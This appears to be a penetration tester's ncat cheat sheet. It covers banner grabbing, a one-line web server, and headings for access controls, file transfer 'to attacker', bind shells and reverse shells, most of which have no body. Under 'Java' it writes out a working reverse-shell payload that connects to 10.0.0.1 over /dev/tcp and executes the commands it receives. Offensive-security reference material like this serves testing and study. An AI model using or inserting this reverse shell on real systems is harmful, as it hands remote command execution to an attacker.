Name
ncat — Concatenate and redirect sockets

Synopsis
ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://bitrot.sh/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">
...

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

A Better HTTP Server

Unwrap SSL Connections

Connect two incoming connections

Connect two listening servers

Telnet

Simple Chat

Copy Files with UDP

Access Controls

Whitelist IPs

Whitelist from file

Blacklist IPs

Blacklist IPs from file

File Transfer with SSL

Reverse file transfer to attacker

File send w/ Sender listening

Bind Shell

Reverse Shell

Bash

Perl

PHP

PowerShell

Python 2.7 and 3

Ruby

Netcat

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

security researcher and penetration tester. twitter: @kali_null